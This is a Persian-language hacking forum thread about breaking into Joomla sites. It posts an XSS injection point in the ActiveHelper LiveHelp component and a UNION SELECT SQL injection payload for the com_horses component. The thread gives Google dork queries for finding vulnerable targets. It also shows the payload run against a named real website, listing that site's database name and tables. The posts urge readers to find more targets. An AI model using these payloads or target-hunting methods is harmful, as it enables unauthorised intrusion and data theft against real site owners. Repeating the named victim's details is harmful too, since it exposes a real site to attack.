spyman

_.-*نفوذ به سیستم مدیریت محتوای Joomla به همراه مثال*-._

4 پست در این موضوع

ارسال شده در (ویرایش شده)

سلام

تو این تاپیک یه سری باگ های Sqli و Rfi و XSS به همراه مثال معرفی می شه

درسته که لینک این اکسپلویت ها در سایت های Expliot db و امثالهم موجود است ، اما در اینجا نوعی Target Training هم برای تمرین گفته خواهد شد.

قوانین تاپیک :

1- جواب پیشنهاد و انتقاد شما در تایپیک _.-*سوالات هک و امنیت*-._ قرار داده شود .

2- آموزش هک به تایپیک _.-* آموزش قدم به قدم هک *-._ بروید .

3-_.-*بازار باگ جوملا مخلوت ( جدام نمیشه . درهم و برهمه )*-._

4- جهت بالا بردن امنیت جومیلا به تایپیک _.-*دیوار آتش برای جومیلا*-._ قرار داده شود .

5 - در صورتی که با پستی موافق هستید فقط دگمه تشکر رو بزنید تا مدیریت هم از امار موافق اون مورد اطلاع پیدا کنه.

6- تمرینات تو گروه هک انجام میدم و کسای که میخوان بیان پیام خصوصی بدن .

ویرایش شده در توسط spyman

Share this post


Link to post
Share on other sites
آموزش ووکامرس قالب جوملا قالب وردپرس قالب رایگان وردپرس قالب رایگان جوملا هاست نامحدود هاست جوملا هاست لاراول هاست وردپرس هاست ارزان هاست ربات تلگرام خرید دامنه آموزش ساخت ربات تلگرام با php آموزش لاراول آموزش cPanel آموزش php آموزش فرم ساز RSform آموزش ساخت ربات جذب ممبر آموزش ساخت ربات دوستیابی آموزش ساخت ربات فروشگاهی برای ووکامرس آموزش طراحی سایت داینامیک با php آموزش بخش پشتیبانی با rsticket

سیستم جوملا معمولا به شکل های زیر نشان داده میشه :

 /index.php?option=com_----"Name Of Component" 

یا

 /component/option,com_"Name Of Component"/ 

در پست های بعدی اکسپلویت هایی معرفی میشه که شما می تونید هدف های بیشتر به صورت زیر در موتور های جستجو پیدا کنید »

 inurl:"com_نام کامپوننت"

Share this post


Link to post
Share on other sites

Joomla Component com_activehelper_livehelp v2.0.3 XSS Vulnerability

جدیدترین اکسپلویت پیدا شده از جوملا که بر روی کامپوننت "com_activehelper_livehelp

" به صورت Cross Site (XSS) تاثیر گذار است.

# Exploit Title: Joomla Component ActiveHelper LiveHelp XSS Vulnerabilities
# Date: 18.05.2010
# Author: Valentin
# Category: webapps/0day
# Version: 2.0.3


>> #1 Vulnerability
Type = XSS
Example URIs
->target-site/administrator/components/com_activehelper_livehelp/server/
---->index.php?DOMAINID=XX&URL=XX&TITLE=XX&SERVER=[XSS]
---->cookies.php?&DOMAINID=[XSS]

Share this post


Link to post
Share on other sites

اینم جدیده و بد نیست ،

[+] Title : Joomla Component com_horses SQL Injection Vulnerability
[+] Author: Kernel Security Group
[+] Data  : 2010-05-19

[+] Vulnerable File :

http://127.0.0.1/index.php?option=com_horses&task=getnames&id=-[sql]
] 
[+] ExploiT         :

-1/**/UNION/**/SELECT/**/1,2,3,4,5,6--

[+] Example         :

http://127.0.0.1/index.php?option=com_horses&task=getnames&id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6--

اینم یک دمو :

http://www.sigginshorseco.com/index.php?option=com_horses&task=getnames&id=-1/**/UNION/**/SELECT/**/1,2,version%28%29,4,5,6

--

اینم دیتابیس دمو : siggins_jo152

اینم تیبل هاش :

jos      
jos_core_acl_groups_aro_map     
jos_core_acl_aro_sections     
jos_core_acl_aro_map     
jos_core_acl_aro_groups     
jos_core_acl_aro     
jos_content_rating     
jos_content_frontpage     
jos_content     
jos_contact_details     
jos_components     
jos_categories     
jos_bannertrack     
jos_bannerclient     
jos_banner     
jos_aicontactsafe_statuses     
jos_aicontactsafe_profiles     
jos_aicontactsafe_messages     
jos_aicontactsafe_messagefiles     
jos_aicontactsafe_fieldvalues     
jos_aicontactsafe_fields     
jos_aicontactsafe_contactinformations     
jos_aicontactsafe_config     
jos_adsmanager_profile     
jos_adsmanager_positions     
jos_adsmanager_fields     
jos_adsmanager_field_values     
jos_adsmanager_config     
jos_adsmanager_columns     
jos_adsmanager_categories     
jos_adsmanager_ads     
jos_adsmanager_adcat     
jos_acymailing_userstats     
jos_acymailing_urlclick     
jos_acymailing_url     
jos_acymailing_template     
jos_acymailing_subscriber     
jos_acymailing_stats     
jos_acymailing_queue     
jos_acymailing_mail     
jos_acymailing_listsub     
jos_acymailing_listmail     
jos_acymailing_listcampaign     
jos_acymailing_list     
jos_acymailing_fields     
jos_acymailing_config 

تنبل نباشیم و بریم خودمون چندتا Dork پیدا کنیم :

http://www.google.com/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&hl=en&source=hp&q=inurl%3A%22com_horses%22&btnG=Google+Search

تارگت های بیشتر رویه سایت های روسی فعاله

Share this post


Link to post
Share on other sites

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری